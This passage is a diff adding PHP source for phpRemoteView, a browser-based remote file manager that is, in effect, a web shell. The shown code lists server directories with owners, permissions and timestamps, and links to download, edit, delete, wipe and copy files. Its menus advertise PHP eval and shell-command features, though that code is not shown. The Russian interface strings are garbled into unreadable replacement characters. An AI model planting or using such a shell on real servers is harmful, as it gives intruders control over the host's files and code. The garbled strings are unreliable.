+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ������ �������
+
+$cp[3]: ��� ������
+
+$cp[4]: ������ ������
+
+*/
+
+   // ��� ����������� �������
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"������",
+"View file"=>"����� �����",
+"DISK"=>"����",
+"Info"=>"����",
+"Plain"=>"������",
+"HTML"=>"HTML",
+"Session"=>"������",
+"Image"=>"��������",
+"Notepad"=>"�������",
+"DOWNLOAD"=>"���������",
+"Edit"=>"������",
+"Sorry, this programm run in read-only mode."=>"��������, ��� ��������� �������� � ������ '������ ������'.",
+"For full access: write"=>"��� ������� �������: ��������",
+"in this php-file"=>"� ���� php-�����",
+"Reason"=>"�������",
+"Error path"=>"��������� ����",
+"Click here for start"=>"������� ��� ������",
+"up directory"=>"������� ����",
+"access denied"=>"������ ��������",
+"REMVIEW TOOLS"=>"������� REMVIEW",
+"version"=>"������",
+"Free download"=>"���������� ��������",
+"back to directory"=>"��������� � �������",
+"Size"=>"������",
+"Owner"=>"�����",
+"Group"=>"������",
+"FileType"=>"��� �����",
+"Perms"=>"�����",
+"Create time"=>"����� ��������",
+"Access time"=>"����� �������",
+"MODIFY time"=>"����� ���������",
+"HEXDUMP PREVIEW"=>"������������ � 16-������ ����",
+"ONLY READ ACCESS"=>"������ ������ �� ������",
+"Can't READ file - access denied"=>"�� ���� ��������� - ������ ��������",
+"full read/write access"=>"������ ������ �� ������/������",
+"FILE SYSTEM COMMANDS"=>"������� �������� �������",
+"EDIT"=>"������.",
+"FILE"=>"����",
+"DELETE"=>"�������",
+"Delete this file"=>"������� ����",
+"CLEAN"=>"��������",
+"TOUCH"=>"��������",
+"Set current 'mtime'"=>"�����.�����.�����",
+"WIPE(delete)"=>"����������",
+"Write '0000..' and delete"=>"������ ������, �������",
+"COPY FILE"=>"���������� ����",
+"COPY"=>"����������",
+"MAKE DIR"=>"������� �������",
+"type full path"=>"������� ������ ����",
+"MkDir"=>"����.���.",
+"CREATE NEW FILE or override old file"=>"������� ����� ���� ��� ������������ ������",
+"CREATE/OVERRIDE"=>"�������/������������",
+"select file on your local computer"=>"������� ���� �� ����� ��������� ����������",
+"save this file on path"=>"��������� ���� ���� � �������",
+"create file name automatic"=>"��������� ��� ����� �������������",
+"OR"=>"���",
+"type any file name"=>"������ ��� ����� �������",
+"convert file name to lovercase"=>"�������������� ��� � ������ �������",
+"Send File"=>"������� ����",
+"Delete all files in dir"=>"������� ��� �����",
+"Delete all dir/files recursive"=>"������� ��� +����������� ����������",
+"Confirm not found (go back and set checkbox)"=>"������������� �� ���������� (��������� ����� � ��������� �������)",
+"Delete cancel - File not found"=>"�������� �������� - ���� �� ������",
+"YES"=>"��",
+"ME"=>"����",
+"NO (back)"=>"��� (�����)",
+"Delete cancel"=>"�������� ��������",
+"ACCESS DENIED"=>"������ ��������",
+"done (go back)"=>"������ (�����)",
+"Delete ok"=>"��, ��������",
+"Touch cancel"=>"���������� ��������",
+"Touch ok (set current time to 'modify time')"=>"���������� ��������� (����� ��������� ������� ����� �����������)",
+"Clean (empty file) cancel"=>"�������� (��������� �����) ��������",
+"Clean ok (file now empty)"=>"��, ������� (���� �������)",
+"Wipe cancel - access denied"=>"����������� �������� - ������ ��������",
+"Wipe ok (file deleted)"=>"��, ���������� (� ���� �����)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"�������� ���� ������ �",
+"skip"=>"�������",
+"deleting"=>"��������",
+"Deleting all dir/files (recursive) in"=>"�������� ���� ������/������������ (����������)",
+"DONE, go back"=>"������, �����",
+"DONE"=>"������",
+"file not found"=>"���� �� ������",
+"ONLY READ ACCESS (don't edit!)"=>"������ ������ �� ������ (�� �������������)",
+"Can't READ file - access denied (don't edit!)"=>"�� ���� ������ ���� - ������ ��������",
+"EDIT FILE"=>"������� ����",
+"can't open, access denied"=>"�� ���� �������, ������ ��������",
+"SAVE FILE (write to disk)"=>"��������� ���� (������ �� ����)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"�� ������ �������� ������� [������� ���� �������������] ��� ������ � ���� ��� �����!'",
+"SAVING TO"=>"��������� �",
+"Sorry, access denied"=>"��������, ������ ��������",
+"for example, uncomment next line"=>"��� �������, ���������������� ��������� ������",
+"Eval PHP code"=>"��������� PHP ���",
+"don't type"=>"�� ������",
+"and"=>"�",
+"example (remove comments '#')"=>"������ (������� ����������� '#')",
+"Shell commands"=>"������� Shell'a",
+"filesize to 0byte"=>"������ � 0 ����",
+"from"=>"��",
+"to"=>"�",
+"Full file name"=>"������ ��� �����",
+"Can't open directory"=>"�� ���� ������� �������",
+"setup"=>"���������",
+"back"=>"�����",
+"Reset all settings"=>"�������� ��� ���������",
+"clear"=>"��������",
+"Current"=>"�������",
+"Colums and sort"=>"������� � ����������",
+"Sort order"=>"������� ����������",
+"Ascending sort"=>"�� �����������",
+"Descending sort"=>"�� ��������",
+"Sort by filename"=>"����������� �� ����� �����",
+"Sort by filename extension"=>"����������� �� ���������� �����",
+"Date/time format"=>"������ ����/�������",
+"Panel font & size"=>"�����/������ ������",
+"Setup"=>"�����",
+"Char map"=>"�������",
+"Language"=>"����",
+"English"=>"����������",
+"Russian"=>"�������",
+"Character map (symbol codes table)"=>"������� ��������",
+"Select font"=>"�������� �����",
+"or type other"=>"��� ������� ������",
+"Font size"=>"������ ������",
+"Code limit"=>"������� �����",
+"Generate table"=>"������������� �������",
+"Universal convert"=>"������������� �����������"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"���",
+'n'=>"���",
+'s'=>"������",
+'o'=>"��������",
+'g'=>"������",
+'a'=>"��������/������",
+'c'=>"�����",
+'1'=>"������",
+'2'=>"�������",
+'3'=>"������"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="��";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+                  break;
+               default:
+                  echo jsval("??");
+                  break;
+               }
+               break;
+            
+            case "s": 
+               if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); 
+               else echo jsval(''); 
+               break;
+            
+            case "o": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               echo jsval($tow);
+               break;
+            
+            case "g": 
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval($tgr);
+               break;
+            
+            case "a": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
